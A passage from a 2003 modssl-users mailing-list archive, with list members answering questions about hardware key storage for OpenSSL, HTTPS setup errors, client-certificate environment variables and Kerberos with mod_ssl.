	by mystic1.trustcenter.de (8.11.6+Sun/8.11.6) id hAAGcNi18377
	for ; Mon, 10 Nov 2003 17:38:23 +0100 (MET)
Received: from venus.trustcenter.de(192.168.202.4) by mystic1.trustcenter.de via csmap (V6.0)
	id srcAAAllaa5J; Mon, 10 Nov 03 17:38:22 +0100
Received: from trustcenter.de (titan.trustcenter.de [192.168.200.244])
	by venus.trustcenter.de (8.12.9/TC TrustCenter Mailserver) with ESMTP id hAAGcJMv024368
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=OK);
	Mon, 10 Nov 2003 17:38:22 +0100
Message-ID: <3FAFBEF7.9080105@trustcenter.de>
Date: Mon, 10 Nov 2003 17:38:15 +0100
From: Goetz Babin-Ebell 
Organization: TC TrustCenter AG
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030624
X-Accept-Language: de-de, de, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Providers of hardware key storage
References:  <002601c3a5b0$1aa7fd70$0a00a8c0@franciscw2rh7k>
In-Reply-To: <002601c3a5b0$1aa7fd70$0a00a8c0@franciscw2rh7k>
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms030404000709060102080107"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Goetz Babin-Ebell 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms030404000709060102080107
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hello Francisco,

Francisco Corella wrote:
> Hi Goetz,

>>OpenSSL comes with build in support for different
>>crypto hardware (called ENGINE, in crypto/engine/).
>>But support for additional crypto engines may be added on run time.
>>
>>Please search the OpenSSL web pages.
> 
> I think I understand, at least in principle, how to use hardware crypto with
> mod_ssl.  But there are two ways of doing it, depending of where you keep
> the server key:
> 
> (a) You may keep the server key in a file specified by the directive
> SSLCertificateKeyFile, and send the key to the hardware for each operation
> that requires use of the key.  Or,
> 
> (b) You may keep the server key in the hardware, and tell the hardware what
> key to use for each operation in some ad-hoc fashion.
> 
> My understanding is that most hardware crypto uses option (a).  I know that
> nCipher lets you use option (a) or option (b), but using option (b) requires
> buying the tamperproof card called "nForce", which is very expensive,
> instead of the vanilla "nFast" card.
> 
> What I was asking is whether there is other crypto hardware out there that
> lets you use option (b).  I'm hoping to find something less expensive than
> nForce.

Eracom has a crypto card.
It is accessed with a PKCS#11 interface.

There are several PKCS#11 ENGINE implementations for OpenSSL
available.
(One from Bull, one from eracom, may be others)

Have a look at one of these.


Bye

Goetz

-- 
Goetz Babin-Ebell, TC TrustCenter AG, http://www.trustcenter.de
Sonninstr. 24-28, 20097 Hamburg, Germany
Tel.: +49-(0)40 80 80 26 -0,  Fax: +49-(0)40 80 80 26 -126

--------------ms030404000709060102080107
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIIkDCC
BEQwggOtoAMCAQICDwCQHgAAAAJOQu0jEgf3pTANBgkqhkiG9w0BAQUFADCBvDELMAkGA1UE
BhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxOjA4BgNVBAoTMVRD
IFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBpbiBEYXRhIE5ldHdvcmtzIEdtYkgxIjAgBgNV
BAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMgQ0ExKTAnBgkqhkiG9w0BCQEWGmNlcnRpZmlj
YXRlQHRydXN0Y2VudGVyLmRlMB4XDTAzMDIxMDE0NDI1MFoXDTA0MDIxMDE0NDI1MFowgaox
CzAJBgNVBAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMRowGAYD
VQQKExFUQyBUcnVzdENlbnRlciBBRzEUMBIGA1UECxMLRW50d2lja2x1bmcxGjAYBgNVBAMT
EUdvZXR6IEJhYmluLUViZWxsMSkwJwYJKoZIhvcNAQkBFhpiYWJpbi1lYmVsbEB0cnVzdGNl
bnRlci5kZTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALB6adN6EChrpAbT5KV1
ceRRIDAoGnz2gsBoFI2BwJLS+RpuIZfdJOepm4crg3X6LXrMKwSF/lshFeHrVPtLzabgLGyF
SujsJP0z3u7f4XNYCGHl4UbyPkYboIP9GC/DRtsknO1YfJUy/4yKBG4VjJ4AP6vZTEQey6jm
xelsK2ek4vwRfUjs/z9UcZmtj4ipiHP6IqFyydDTLarn1jWHUu2zFnJzryZ6mXdOUPihCOFG
D+c1KFksZ1VscgDpKygTQcIg/VItmbeFkhOj9IkboOyiVKvvfhujlxmdm9ACt22MjMrB0RAb
9TR1DgXlyofwykKAK+GM8Cu8jcKaJjvfhaMCAwEAAaOB0zCB0DAMBgNVHRMBAf8EAjAAMA4G
A1UdDwEB/wQEAwIF4DA+BglghkgBhvhCAQgEMRYvaHR0cDovL3d3dy50cnVzdGNlbnRlci5k
ZS9ndWlkZWxpbmVzL2luZGV4Lmh0bWwwEQYJYIZIAYb4QgEBBAQDAgWgMF0GCWCGSAGG+EIB
AwRQFk5odHRwczovL3d3dy50cnVzdGNlbnRlci5kZS9jZ2ktYmluL2NoZWNrLXJldi5jZ2kv
OTAxRTAwMDAwMDAyNEU0MkVEMjMxMjA3RjdBNT8wDQYJKoZIhvcNAQEFBQADgYEAObOwuCFG
0HmVvCm8llpJ3qsBqtZgFyUT0wuz8JG6CZjHn5lwvOg+8m8huKrE5oGEQIo9EwLcFLDNVsxB
CiwjX2juU3JQl2Hs2smUyHkOqg+W0COetRp+PcDAk4hk0Mth5A3bDy3FrzyhbjpYjAZTvnsY
9+QYmJm5cGWBJK9I7kIwggREMIIDraADAgECAg8AkB4AAAACTkLtIxIH96UwDQYJKoZIhvcN
AQEFBQAwgbwxCzAJBgNVBAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1i
dXJnMTowOAYDVQQKEzFUQyBUcnVzdENlbnRlciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3
b3JrcyBHbWJIMSIwIAYDVQQLExlUQyBUcnVzdENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZI
hvcNAQkBFhpjZXJ0aWZpY2F0ZUB0cnVzdGNlbnRlci5kZTAeFw0wMzAyMTAxNDQyNTBaFw0w
NDAyMTAxNDQyNTBaMIGqMQswCQYDVQQGEwJERTEQMA4GA1UECBMHSGFtYnVyZzEQMA4GA1UE
BxMHSGFtYnVyZzEaMBgGA1UEChMRVEMgVHJ1c3RDZW50ZXIgQUcxFDASBgNVBAsTC0VudHdp
Y2tsdW5nMRowGAYDVQQDExFHb2V0eiBCYWJpbi1FYmVsbDEpMCcGCSqGSIb3DQEJARYaYmFi
aW4tZWJlbGxAdHJ1c3RjZW50ZXIuZGUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQCwemnTehAoa6QG0+SldXHkUSAwKBp89oLAaBSNgcCS0vkabiGX3STnqZuHK4N1+i16zCsE
hf5bIRXh61T7S82m4CxshUro7CT9M97u3+FzWAhh5eFG8j5GG6CD/Rgvw0bbJJztWHyVMv+M
igRuFYyeAD+r2UxEHsuo5sXpbCtnpOL8EX1I7P8/VHGZrY+IqYhz+iKhcsnQ0y2q59Y1h1Lt
sxZyc68mepl3TlD4oQjhRg/nNShZLGdVbHIA6SsoE0HCIP1SLZm3hZITo/SJG6DsolSr734b
o5cZnZvQArdtjIzKwdEQG/U0dQ4F5cqH8MpCgCvhjPArvI3CmiY734WjAgMBAAGjgdMwgdAw
DAYDVR0TAQH/BAIwADAOBgNVHQ8BAf8EBAMCBeAwPgYJYIZIAYb4QgEIBDEWL2h0dHA6Ly93
d3cudHJ1c3RjZW50ZXIuZGUvZ3VpZGVsaW5lcy9pbmRleC5odG1sMBEGCWCGSAGG+EIBAQQE
AwIFoDBdBglghkgBhvhCAQMEUBZOaHR0cHM6Ly93d3cudHJ1c3RjZW50ZXIuZGUvY2dpLWJp
bi9jaGVjay1yZXYuY2dpLzkwMUUwMDAwMDAwMjRFNDJFRDIzMTIwN0Y3QTU/MA0GCSqGSIb3
DQEBBQUAA4GBADmzsLghRtB5lbwpvJZaSd6rAarWYBclE9MLs/CRugmYx5+ZcLzoPvJvIbiq
xOaBhECKPRMC3BSwzVbMQQosI19o7lNyUJdh7NrJlMh5DqoPltAjnrUafj3AwJOIZNDLYeQN
2w8txa88oW46WIwGU757GPfkGJiZuXBlgSSvSO5CMYIEdzCCBHMCAQEwgdAwgbwxCzAJBgNV
BAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMTowOAYDVQQKEzFU
QyBUcnVzdENlbnRlciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3b3JrcyBHbWJIMSIwIAYD
VQQLExlUQyBUcnVzdENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZIhvcNAQkBFhpjZXJ0aWZp
Y2F0ZUB0cnVzdGNlbnRlci5kZQIPAJAeAAAAAk5C7SMSB/elMAkGBSsOAwIaBQCgggJ7MBgG
CSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTAzMTExMDE2MzgxNlow
IwYJKoZIhvcNAQkEMRYEFJYrDhD3R+uSCn1JJ2/CO7em/hmTMFIGCSqGSIb3DQEJDzFFMEMw
CgYIKoZIhvcNAwcwDgYIKoZIhvcNAwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0G
CCqGSIb3DQMCAgEoMIHhBgkrBgEEAYI3EAQxgdMwgdAwgbwxCzAJBgNVBAYTAkRFMRAwDgYD
VQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMTowOAYDVQQKEzFUQyBUcnVzdENlbnRl
ciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3b3JrcyBHbWJIMSIwIAYDVQQLExlUQyBUcnVz
dENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZIhvcNAQkBFhpjZXJ0aWZpY2F0ZUB0cnVzdGNl
bnRlci5kZQIPAJAeAAAAAk5C7SMSB/elMIHjBgsqhkiG9w0BCRACCzGB06CB0DCBvDELMAkG
A1UEBhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxOjA4BgNVBAoT
MVRDIFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBpbiBEYXRhIE5ldHdvcmtzIEdtYkgxIjAg
BgNVBAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMgQ0ExKTAnBgkqhkiG9w0BCQEWGmNlcnRp
ZmljYXRlQHRydXN0Y2VudGVyLmRlAg8AkB4AAAACTkLtIxIH96UwDQYJKoZIhvcNAQEBBQAE
ggEAcg6InxXyf+WrdomlnXdfq/SbmX2oZ9i7DbFYVgahr44AaoAxSdQ09s8+wEtd8yRj6Ox2
lRzaWZkKwKcgO/1DQDcirJMi4LffRrONnlK+Ah04ZyIkShr7Osoi0uHWhthNyveafaRYL4ZQ
cyLDUR5qrsLRRJz21n/+Njab3U5jCdETmOilWvF0mup0HnkmVLTjohJfpETNdpiCoas/Au6T
9NfmTPfeu+hQM285rwZMKUTjvpRsyupsK3jbq2y2WIlF4BgC5b6gbIteBVBuvQ/ORMz6yeQd
lyiYvUUGwvrhi88t330NMlwdqG8oTbXhV8Mt2FyOpeNpAvJLsSfKuaPtlgAAAAAAAA==
--------------ms030404000709060102080107--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 10 19:25:38 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 05107A895E; Mon, 10 Nov 2003 19:25:37 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp104.mail.sc5.yahoo.com (smtp104.mail.sc5.yahoo.com [66.163.169.223])
	by master.modssl.org (Postfix) with SMTP id CADA9A8959
	for ; Mon, 10 Nov 2003 19:25:20 +0100 (CET)
Received: from 12-224-33-78.client.attbi.com (HELO franciscw2rh7k) (francisco?corella@12.224.33.78 with login)
  by smtp-v1.mail.vip.sc5.yahoo.com with SMTP; 10 Nov 2003 18:25:18 -0000
Message-ID: <003701c3a7b8$02b36c40$0a00a8c0@franciscw2rh7k>
From: "Francisco Corella" 
To: 
Subject: Re: Providers of hardware key storage
Date: Mon, 10 Nov 2003 10:25:25 -0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Francisco Corella" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Goetz,

Thanks a lot for your help.  I've looked at the web sites for Eracom and
Bull and I've found their PCI cards, which do indeed provide key storage.  I
will contact them to get more details.

Thanks again!

Francisco

----- Original Message -----
From: "Goetz Babin-Ebell" 
To: 
Sent: Monday, November 10, 2003 8:38 AM
Subject: Re: Providers of hardware key storage


> Hello Francisco,
>
> Francisco Corella wrote:
> > Hi Goetz,
>
> >>OpenSSL comes with build in support for different
> >>crypto hardware (called ENGINE, in crypto/engine/).
> >>But support for additional crypto engines may be added on run time.
> >>
> >>Please search the OpenSSL web pages.
> >
> > I think I understand, at least in principle, how to use hardware crypto
with
> > mod_ssl.  But there are two ways of doing it, depending of where you
keep
> > the server key:
> >
> > (a) You may keep the server key in a file specified by the directive
> > SSLCertificateKeyFile, and send the key to the hardware for each
operation
> > that requires use of the key.  Or,
> >
> > (b) You may keep the server key in the hardware, and tell the hardware
what
> > key to use for each operation in some ad-hoc fashion.
> >
> > My understanding is that most hardware crypto uses option (a).  I know
that
> > nCipher lets you use option (a) or option (b), but using option (b)
requires
> > buying the tamperproof card called "nForce", which is very expensive,
> > instead of the vanilla "nFast" card.
> >
> > What I was asking is whether there is other crypto hardware out there
that
> > lets you use option (b).  I'm hoping to find something less expensive
than
> > nForce.
>
> Eracom has a crypto card.
> It is accessed with a PKCS#11 interface.
>
> There are several PKCS#11 ENGINE implementations for OpenSSL
> available.
> (One from Bull, one from eracom, may be others)
>
> Have a look at one of these.
>
>
> Bye
>
> Goetz
>
> --
> Goetz Babin-Ebell, TC TrustCenter AG, http://www.trustcenter.de
> Sonninstr. 24-28, 20097 Hamburg, Germany
> Tel.: +49-(0)40 80 80 26 -0,  Fax: +49-(0)40 80 80 26 -126


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 11 03:38:49 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AF3B3A895E; Tue, 11 Nov 2003 03:38:49 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from minataur (h00a024bdb31d.ne.client2.attbi.com [24.128.34.68])
	by master.modssl.org (Postfix) with ESMTP id 8160BA893A
	for ; Tue, 11 Nov 2003 03:38:28 +0100 (CET)
Received: from playroom ([192.168.0.8] helo=playroom.ginkwunk.net)
	by minataur with esmtp (Exim 4.24)
	id 1AJOQ3-00062k-KX
	for modssl-users@modssl.org; Mon, 10 Nov 2003 21:38:15 -0500
Received: from streph by playroom.ginkwunk.net with local (Exim 4.24)
	id 1AJOQ2-00045r-Be
	for modssl-users@modssl.org; Mon, 10 Nov 2003 21:38:14 -0500
Date: Mon, 10 Nov 2003 21:38:14 -0500
From: Streph Treadway 
To: modssl-users@modssl.org
Subject: [sbt@ginkwunk.net: Unexpected Termination]
Message-ID: <20031111023814.GA15709@ginkwunk.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.4i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Streph Treadway 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Two days ago I sent the attached message to modssl-users without
apparent success.  I did not receive it, although since then I have
received other messages from the list, and it has not appeared in the
archives.  I hope you can help me.

Streph

----- Forwarded message from Streph Treadway  -----

> From: Streph Treadway 
> To: modssl-users@modssl.org
> Subject: Unexpected Termination
> 
> Hi, all,
> 
> I am hopeful that one or more of you may be able to resolve my newbie
> question.
> 
> I am trying to use mod_ssl (2.8.15) with Apache 1.3.29 statically linked with
> mod_perl (1.29).  Both are the current Debian unstable version.  Http
> connections work fine, but any attempt to connect with https from
> Mozilla results in an error message that the connection terminated
> unexpectedly.  the apache-perl error log says: 
> 
> Invalid method in request \x80g\x01\x03
> 
> I created keys and certificates as described in the FAQ.
> I have checked the list archives and found advice to another facing a
> similar problem to not forget SSLEngine On.  I have set SSLEngine to on
> and when I start apache I am asked for and can successfully enter my
> passphrase.  An nmap scan of my server shows open ports at 80 and 443.
> 
> In addition to including LoadModule line for mod_ssl, my httpd.conf has
> Listen directives for both port 80 and 443.  I also have the following
> virtual host, which I suspect may be the source of my problems:
> 
> 
>     SSLEngine On
>     SSLProtocol all
>     DocumentRoot /var/classweb
>     SSLCACertificateFile /path/to/ca.crt
>     SSLCertificateFile /path/to/server.crt
>     SSLCertificateKeyFile /path/to/server.key
>     SSLVerifyClient 0
>     SSLVerifyDepth 10
>     SSLCipherSuite
>     ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> 
> 
> I expect the answer may be obvious, but I do not see it in the
> documentation or the list archives.  I appreciate any help you can give.
> 
> Yours,
> 
> Streph

----- End forwarded message -----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 11 22:17:14 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 65CB9A893D; Tue, 11 Nov 2003 22:17:14 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 53383A8939
	for ; Tue, 11 Nov 2003 22:16:58 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id BD14E6E4028; Tue, 11 Nov 2003 22:16:51 +0100 (CET)
Date: Tue, 11 Nov 2003 22:16:51 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Client Info
Message-ID: <20031111211651.GA29676@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <1323000604.20031109160159@holotech.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <1323000604.20031109160159@holotech.net>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sun, Nov 09, 2003 at 04:01:59PM -0500, modssl@holotech.net wrote:
> I aplogize if this is a re-send. I never heard anything back about it,
> and it seems like a pretty simple question, so I don't know if my
> message went out to the list.
> 
> The SSL_CLIENT_* variables are not appearing in my environment. My web
> host insists it's something my CGI needs to do to request this
> information from the client, but that doesn't make sense to me. I
> obtained a certificate from Thawte and installed it in my browser, but
> that doesn't make a difference. Is there something else I need to do?
> Is there something my host needs to do?
> 
Those fields will be filled when using client certificates - see
http://www.modssl.org/docs/2.8/ssl_reference.html#ToC17

also remember to turn on SSLOptions +StdEnvVars - see
http://www.modssl.org/docs/2.8/ssl_reference.html#ToC21

vh

Mads Toftum
-- 
Speaking at ApacheCon 2003 - http://ApacheCon.com/
T03, "Apache 2 mod_ssl tutorial" (3h)
WE03, "Troubleshooting Apache configurations" 
WE11, "Apache mod_rewrite, the Swiss Army Knife of URL manipulation" 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 11 22:23:50 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DE5EAA893D; Tue, 11 Nov 2003 22:23:50 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 92BBAA8939
	for ; Tue, 11 Nov 2003 22:23:49 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id 528646E4028; Tue, 11 Nov 2003 22:23:49 +0100 (CET)
Date: Tue, 11 Nov 2003 22:23:49 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: mod_ssl & kerberos ?
Message-ID: <20031111212349.GB29676@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <20031110125833.1087f239.community@struck.lu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20031110125833.1087f239.community@struck.lu>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Nov 10, 2003 at 12:58:33PM +0100, Daniel Struck wrote:
> Hello,
> 
> 
> I want to ask if the following setup is possible:
> 
> 
> Clients will be authenticated towards apache with x509 certificates (mod_ssl).
> 
> Would it now be possible to give authenticated clients a kerberos ticket which could be read out in php/perl?
> I would like to use this ticket to authenticate the client towards a database like postgresql.
> 
I imagine something like http://modauthkerb.sourceforge.net/ along
with SSLOptions +FakeBasicAuth could do the trick (YMMV - I don't know
enough about Kerberos to know wether that type of usernames would be
a problem).

http://www.modssl.org/docs/2.8/ssl_reference.html#ToC21

vh

Mads Toftum
-- 
Speaking at ApacheCon 2003 - http://ApacheCon.com/
T03, "Apache 2 mod_ssl tutorial" (3h)
WE03, "Troubleshooting Apache configurations" 
WE11, "Apache mod_rewrite, the Swiss Army Knife of URL manipulation" 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 11 22:29:41 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7B611A897D; Tue, 11 Nov 2003 22:29:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from relay.pair.com (relay.pair.com [209.68.1.20])
	by master.modssl.org (Postfix) with SMTP id C5964A893D
	for ; Tue, 11 Nov 2003 22:29:24 +0100 (CET)
Received: (qmail 57171 invoked from network); 11 Nov 2003 21:29:23 -0000
Received: from unknown (HELO holotech-4edh67) (65.217.105.234)
  by relay.pair.com with SMTP; 11 Nov 2003 21:29:23 -0000
X-pair-Authenticated: 65.217.105.234
Date: Tue, 11 Nov 2003 16:29:22 -0500
From: modssl@holotech.net
X-Mailer: The Bat! (v1.60q) Personal
Organization: Holotech Enterprises
X-Priority: 3 (Normal)
Message-ID: <8235844782.20031111162922@holotech.net>
To: Mads Toftum 
Subject: Re[2]: Client Info
In-Reply-To: <20031111211651.GA29676@toftum.dk>
References: <1323000604.20031109160159@holotech.net>
 <20031111211651.GA29676@toftum.dk>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl@holotech.net
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks for the reply. I should be able to just add these lines to my
.htaccess:

SSLVerifyClient optional
SSLOptions +StdEnvVars

and have the client variables in my environment (assuming the client
has a certificate installed), correct? Sorry I didn't RTFM earlier,
but I assumed it would be something complicated, and something only my
host could configure anyway.

Anyway, I tried that and I still don't get the client variables. Am I
missing something? Is it possible the main configuration is overriding
mine?

-- 
Alan Little
Holotech Enterprises

On Tuesday, November 11, 2003, 4:16:51 PM, you wrote:


> On Sun, Nov 09, 2003 at 04:01:59PM -0500, modssl@holotech.net wrote:
>> I aplogize if this is a re-send. I never heard anything back about it,
>> and it seems like a pretty simple question, so I don't know if my
>> message went out to the list.
>> 
>> The SSL_CLIENT_* variables are not appearing in my environment. My web
>> host insists it's something my CGI needs to do to request this
>> information from the client, but that doesn't make sense to me. I
>> obtained a certificate from Thawte and installed it in my browser, but
>> that doesn't make a difference. Is there something else I need to do?
>> Is there something my host needs to do?
>> 
> Those fields will be filled when using client certificates - see
> http://www.modssl.org/docs/2.8/ssl_reference.html#ToC17

> also remember to turn on SSLOptions +StdEnvVars - see
> http://www.modssl.org/docs/2.8/ssl_reference.html#ToC21

> vh

> Mads Toftum

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 11 22:42:20 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 872E4A893D; Tue, 11 Nov 2003 22:42:20 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 989C3A8939
	for ; Tue, 11 Nov 2003 22:42:04 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id 448AB6E4028; Tue, 11 Nov 2003 22:42:04 +0100 (CET)
Date: Tue, 11 Nov 2003 22:42:04 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Re[2]: Client Info
Message-ID: <20031111214204.GD29676@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <1323000604.20031109160159@holotech.net> <20031111211651.GA29676@toftum.dk> <8235844782.20031111162922@holotech.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <8235844782.20031111162922@holotech.net>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Nov 11, 2003 at 04:29:22PM -0500, modssl@holotech.net wrote:
> Thanks for the reply. I should be able to just add these lines to my
> .htaccess:
> 
> SSLVerifyClient optional
> SSLOptions +StdEnvVars
> 
require would be better than optional (at least for testing).

> and have the client variables in my environment (assuming the client
> has a certificate installed), correct? Sorry I didn't RTFM earlier,
> but I assumed it would be something complicated, and something only my
> host could configure anyway.
> 
> Anyway, I tried that and I still don't get the client variables. Am I
> missing something? Is it possible the main configuration is overriding
> mine?

I must say that I've never really felt like playing around with my
ssl setup in .htaccess files... one thing to check is wether the 
AllowOverride settings allow those directives in .htaccess - see Override
for SSLVerifyClient and SSLOptions. Especially the Options override 
required by SSLOptions is something that won't be allowed.

vh

Mads Toftum
-- 
Speaking at ApacheCon 2003 - http://ApacheCon.com/
T03, "Apache 2 mod_ssl tutorial" (3h)
WE03, "Troubleshooting Apache configurations" 
WE11, "Apache mod_rewrite, the Swiss Army Knife of URL manipulation" 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 12 15:09:43 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AE23BA8972; Wed, 12 Nov 2003 15:09:43 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.gmx.net (pop.gmx.de [213.165.64.20])
	by master.modssl.org (Postfix) with SMTP id 08322A8938
	for ; Wed, 12 Nov 2003 15:09:27 +0100 (CET)
Received: (qmail 3206 invoked by uid 0); 12 Nov 2003 14:09:26 -0000
Date: Wed, 12 Nov 2003 15:09:26 +0100 (MET)
From: "Lentila de Vultur" 
To: modssl-users@modssl.org
MIME-Version: 1.0
Subject: chain certificates
X-Priority: 3 (Normal)
X-Authenticated-Sender: #0011527116@gmx.net
X-Authenticated-IP: [62.104.157.85]
Message-ID: <13230.1068646166@www35.gmx.net>
X-Mailer: WWW-Mail 1.6 (Global Message Exchange)
X-Flags: 0001
